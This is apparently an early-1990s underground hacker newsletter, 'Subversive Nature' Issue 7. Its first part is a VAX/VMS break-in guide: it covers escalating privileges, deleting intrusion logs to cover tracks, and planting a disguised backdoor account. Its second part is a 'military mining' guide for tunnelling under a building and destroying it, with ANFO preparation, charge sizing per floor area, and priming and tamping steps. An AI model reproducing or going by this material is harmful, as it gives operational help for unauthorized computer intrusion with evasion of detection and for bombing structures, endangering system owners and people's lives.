|
Subversive Nature Issue 7: VAX hacking
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
*******************************************************************************
* *
* From the depths of the computer underground: *
* The newsletter for the procurement of creative anarchy *
* *
* SUBVERSIVE NATURE *
* *
* Editor: BLASTER 3 guys bbs RENEGADE (907)428-2530 *
* Issue number 7:Intro to VAX systems for ninnies *
* Military Mining techniques *
*******************************************************************************
DoNt U LoVe AlTeRnAtInG cApS??
-Joe Blow k-rad user
-------------------------------------------------------------------------------
GREETINGS TO:Great one, Video Interuppt, George W. Hayduke, Sinjin , David
Harber, The Magpie, Bob, loodvrij (sp). And to Genin for all of those
hours ironing out the VAX/VMS shit.
-------------------------------------------------------------------------------
Har!! I am back and there is not a fucking thing you can do to get
rid of me!! Anyway, it is I, the one your parents hate, and your wife
does not want you to hang around with hehe. This issue we start to go into
the basics of VAX, I myself until recently had NO experience what-so-ever
with VAX systems. I know there have been plenty of texts out there dealing
with VAX/VMS, i will try to keep things simple for the person who just
wants to tinker around, and have a chance to play around with one of
the dying breed of computer systems: V A X!
Also in this issue are the NEW user of the month for my bbs, listed
as newuser.dik, and the article on military mining, which is fairly
interesting. Now to the action!!!
VAX systems are exclusively prevalent amongst public universities and
a few other public service institutions like hospitals here in alaska. VAX
systems can boast about having one of the most secure systems in the hands of
a competent system operator. It is the personal opinion of the author that
UNIX hass too many loopholes, and if i had a choice to sysop a system, VAX
would be the one. VAX systems can be identified by the trademark:
No Such Agency System Handler Initialization Tasking network
(NSASHIT)
Username: <---that particular line being the giveaway
How you get into the system is basically your problem, but with a
little luck or whatever should get you in. If the last person who was on the
system was to lazy to properly log off, it is your lucky day. You can tell
if this is so, when you connect you see nothing except:
$
This is your system prompt, and you are IN!! Easy huh? anyway, what
one should do right away is type:
$ show proc/priv
You should try also:
$set proc/priv=all
That should give you all the privleges for a sysop, if not
you just have a regular user account and havta lump it from here,
either try to hack another account, or go back to MORTAL KOMBAT.
Here is the list of priveldges for a root account
7-DEC-1993 19:39:20.74 User: ** Process ID: ******
Node: blah Process name: "****"
Process privileges:
CMKRNL may change mode to kernel
CMEXEC may change mode to exec
SYSNAM may insert in system logical name table
GRPNAM may insert in group logical name table
ALLSPOOL may allocate spooled device
DETACH may create detached processes
DIAGNOSE may diagnose devices
LOG_IO may do logical i/o
GROUP may affect other processes in same group
ACNT may suppress accounting message
PRMCEB may create permanent common event clusters
PRMMBX may create permanent mailbox
PSWAPM may change process swap mode
ALTPRI may set any priority value
SETPRV may set any privilege bit
TMPMBX may create temporary mailbox
WORLD may affect other processes in the world
MOUNT may execute mount acp function
OPER operator privilege
EXQUOTA may exceed quota
NETMBX may create network device
VOLPRO may override volume protection
PHY_IO may do physical i/o
BUGCHK may make bug check log entries
PRMGBL may create permanent global sections
SYSGBL may create system wide global sections
PFNMAP may map to specific physical pages
SHMEM may create/delete objects in shared memory
SYSPRV may access objects via system protection
BYPASS bypasses UIC checking
SYSLCK may lock system wide resources
SHARE may assign channels to non-shared device
GRPPRV group access via system protection
READALL may read anything as the owner
SECURITY may perform security functions
So if you see this *whamo* dude you struck gold. With this access you can
do a lot of cool shit. Now before you do anything, type this:
$show users
you will get a display like this:
VAX/VMS User processes at day-month-year 00:00:00.00
total number of users = 5, number of proccesses=150
Username interactive Subprocess batch
your hacked act 1 <---this is you, the one means you are online
sysop,system 1 <--if you see something like this, GET THE FUCK
ops,security OFF!! it would be bad if you were caught cause
you were stupid, and the other hackers on the
system got booted
terms 148 all this means is other terminals connected to
the same system you are.
Now if the coast is clear you can begin to cover your tracks that you took
on the way in. type this:
$set default sys$system
$show intrusion
what this does is show the intrusion list, as you probably tried 20 or 30 times
to get in, the list can be quite big.
this is the display
Intrusion Type count expiration source
TERMINAL SUSPECT 45 15:30:25.7 _LMS0:
All this means 45 logon attempts which are suspect to hacking from a remote
terminal (gee, really!)--now be sure to copy down the source, in this case
it would be _LMS0. Now type:
$delete intrusion_record
$intrusion:(type:)LMS0:
so once you type that in, the intrusion list will be gone and you are home
free (for now).
Now the fun begins, as you probably want an account for yourself, with
your root access you can do this. type:
$run sys$system:authorize *or*
$set default sys$system
$run authorize
either of which should work, after you hit the <cr> key, you wil get the
prompt:
UAF>
Just a note to you guys, from each of the prompts on VMS/VAX, you can
type "help" and get a huge, very helpful help menu, be sure to log your
session for later use.
The add a user command line goes a something like a thisa:
UAF>add userid/password=password/privleges=SETPRV
The reason why SETPRV is the best for priveleges, and not ALL, is because
the sysop has a list of all his users, which he can see the levels of each of
the users on the system. Since there are only a few users that should have
root access on each system, it would be bad for you to be noticed as you
will probably lose your account. When you have SETPRV as your privleges, when
you logon, and type "show proc/priv" you should see:
Process Privleges
TMPMBX May create temporary mailbox
NETMBX May create network device
from here you can always type "set proc/priv=all" to make yourself a super
user again, but remain to the sysop as a regular user.
Now, back to the UAF prompt you can add a user. To remain hidden from the
watchful eyes of the sysop, you should try to name yourself after things
like PRN for printer MOD for modem, something not out of the ordinary:
example of out of the ordinary: hackerdude, fuckball, cumwad etc etc
here is a good example of a new account:
UAF>add prn_112/password=hahaha/privleges=setprv
and that is all boys and girls you are now ready to go at it. Those were
just some basic things you should do, if i get some positive feedback on this
i will write more in depth stuff. other than that happy hacking!
*******************************************************************************
part 2 of issue 7 of SuBvErSiVe NATurE <---aahahahahaa alternating caps fnord
Military Mining techniques
Military mining is the art of tunneling under an enemy position and
detonating a large charge of explosive. Once one of the most important tasks
of an army engineer, it is almost now a lost art. This is not because it is
ineffective, but rather the fluid tactics of modern warfare have all but
eliminated the conditions under it was used. The days of an army sitting
in trenches a hundred yards from its opponents for months on end is a thing
of the past. Nonetheless, tunneling is still useful for covertly attacking
positions such as storehouses, barracks, or headquarters with minimum risk
to the attacker.
Various terrorist groups, such as the IRA and the Basque ETA, have
dabbled with road mining, but no one of late has tunneled under a structure
with an eye to blowing it up. As near as I have been able to determine, the
last time it was done, was at the siege of the alcazar in Toledo during the
Spanish Civil War.
There are a number of variables to consider with urban tunneling:
soil conditions, depth of the water table, road traffic overhead etc., not to
mention the myriad of things that run underground, such as sewers, telephone
lines, and gas pipes. The easiest way to avoid these is to go straight down
to a depth of 20 to 25 feet before beginning your horizontal tunnel to your
target. How much, or how little you will need to shore your tunnel depends
on the soil condition. The reason the Vietcong had such success with their
tunnels was the heavy clay content of the soil in their area of operations-
it is set like concrete and didn't even need to be shored. On the other hand,
the tunnel at Stalag Luft III was in soil with a heavy sand content. It was
neccessary to shore almost every foot of it.
If the shaft is too close to the water table, you may have to install
a small sump pump to keep things dry. If your tunnel is very long you will
have to insure proper ventilation for your diggers. Believe me, if this is
needed, you will know it. Working underground is hard even when you have
enough air. If you don't, it is exausting and downright painful. Attach a
legnth of 3/4-inch hose to a compressor or air pump and run it up to the
tunnel face (where the digging occurs). Lighting along the tunnel is nice, but
optional. Your diggers just need to have a enough light to work by. The size
of your tunnel will also be dependant upon your circumstances. If it is higher
than it is wide, it will be less likely to cave in.
When tunneling under a structure, always be aware of what types of
pipe you are encountering. When the French resistance tried to blow up a
Gestapo headquarters by placing a charge under it, they did not take a simple
yet important precaution. The charge was placed next to a gas main. When it
blew, so did the whole block. There were so many civilian casualties, that
the Nazis didn't even bother with their usual reprisals.
If the opportunity presents itself, you may want to try a "blitz"
tunnel, entering through a sewer pipe or storm drain. You can cut through
the wall and dig as fast as possible to the target site. If the tunnel is
short-30 feet or less- you may not have to shore. If it is any longer, you
should dig a conventional shaft. The spoil (excavated dirt) maybe disposed of
in the sewer itself since you will ideally be there only a few hours. This is
the least secure of all tunneling jobs.
You may want to try a method used by some enterprising bank burglars
a few years ago. They used a small all-terrain vehicle (ATV) with a trailer
to haul their heavy equipment (torches, core drill, etc) up the storm drain
to the tunnel site. It also made possible their speedy getaway when their
entrance to the vault when their entrance into the vault triggered the alarm.
A good set of mufflers should be fitted. For sawing through sewer walls, one
of the quickest and neatest methods is to use a gas-powered chop saw with a
diamond-impregnated blade. Always use the diamond blade. They are more
expensive than the carbide ones, but they will cut through rebar like it does
not exist.
Tunnel construction
----------------------
While you are contemplating the construction of your tunnel, i suggest
you go to the library and check out a copy of "The Great Escape" by Paul
Brickhill. This is an interesting and highly informative account of the mass
tunnel escape from Stalag Luft III in 1944. One of the most detailed accounts
of covert tunneling available, it includes many helpful hints on what may
occur and how to deal with it. Of course, you wont have the same problems
of concealing your work from constantly prying eyes or making your own tools.
Tunnel Entrances
-------------------
The best place to start a tunnel, from the viewpoint of security is
the basement of a private home or secure commercial firm. You must be able
to work unobserved (duh) and have a safe place to store all the spoil from
the tunnel. If the shaft is to be very long or large there will be lots of
dirt to dispose of. You will have to break through the floor with a pick axe,
sledge hammer or chop saw with diamond-impregnated blades. The latter is the
fastest and neatest way to go if the concrete is not too thick.
Once you have your work area cleared, begin to dig the vertical shaft.
Use buckets on ropes to carry out the excavated dirt. The first couple of
cubic yards should be packed into sandbags for use as tamping when the charge
is emplaced. Once you have reached the desired depth, enlarge the base of the
shaft for use as your workroom. This is where you will store all of your
tools, air pump, dirt tubs, and so on. If at all possible, both the workroom
and the vertical shaft should be heavily shored so that you have a safe place
to go if the tunnel begins to collapse. This is also where your shovelmen
will be stationed.
Tunnel Shaft
--------------
The best size for a tunnel varies with the soil conditions, but one
about 5 feet high and 3 feet wide is big enough to allow one man to work
comfortably on his knees (oooh baby) while wielding a pick axe. The small
army surplus pick works well in cramped quarters. One man can usually dig
a cubic yard of earth per hour. When this has been accomplished, he goes
back to the workroom to rest while the shovelman moves forward with his tub
to clear away to clear away the loose dirt and do any shoring neccesary.
Rounding the top of the tunnel will make it easier to get by without shoring.
To a point, the narrower the tunnel, the less likely that cave ins will
occur.
When trying to decide the size of your tunnel, always bear in mind the
size of the explosive package you will be using. Trying to drag a 50 pound
sack of ANFO through a 2x2 tunnel to the charge chamber tends to be a bit
tiring. Try to make sure the floor is reasonably flat and solid. This will
make it easier to use a hand truck for both disposal of the dirt and for
carrying in the explosive charges. If the tunnel is very long-more than 75 to
100 feet, for instance- use a laser to sight along one wall to make sure it
is straight and level. If you blow up the wrong building people are liable to
talk badly about you.
Charge Chamber
----------------
Once your tunnel is the required length, begin digging upward until you
make contact with the foundation of the target building. Be careful not to
scrape your shovel across the concrete,as this makes quite a bit of noise.
Noise discipline is very important at this point-you would be suprised at how
far sound will carry. Begin digging your charge chamber off to the side of the
shaft. You should already have determined how much space the explosive charge
will occupy. Make the chamber about 5 feet longer than needed. This makes
tamping easier. If your target building is very long you may want to enlarge
the charge chamber into what is known as a "coyote" tunnel. Dig two wings
off to the sides of the charge chmaber at 90-degree angles, parallel to the
legnth of the building.
Computing the charge size
---------------------------
If total destruction of a heavily built structure is required, a good
rule of thumb is to use a quarter pound of high explosive per square foot
of the floor area. In most cases you can get by with about half as much. If
you use a coyote tunnel, divide the charges into thirds.
With such large amounts of explosive required, ANFO is the best way to
go. Prime with at least 10 percent conventional high explosive (HE), such as
TNT or gelatin dynamite;20 percent is better. An easy way to prepare bulk
ANFO is to punch a hole in the top of a bag, insert a funnel, and pour in
the required amount of diesel or fuel oil (1 quart oil per 25 pounds AN). Slap
a square of duct tape over the hole and turn the bag over several times to
get it evenly mixed. Rather than prime every bag, as is common practice, place
your HE in one package and stack the ANFO bags on top of it. This will direct
the detonation waves upward.
Emplacing the charge
------------------------
Once the chamber is ready, prime one of the explosive packages, place
it on the bottom, ans stack the rest of the charge on top of it. The shock
wave of the explosion will travel upwards toward the target. The tamping in
this case is not confining, rather than channeling the force of the blast.
Stack the prepared sandbags in the rest of the chamber until full. Reel the
firing wire out of the tunnel to the firing site.
When the charge is detonating, most of the explosive force will
go straight up into the target. Some of it, especially if it was improperly
tamped, will come up the tunnel looking for you. Don't be near the entrance
when this happens. The shorter the tunnel, the greater the chance of this
happening.
EOF
Since you probably tried many different logins,
you should check the intrusion record that most sysops have enabled
on their system, to see i
|
|
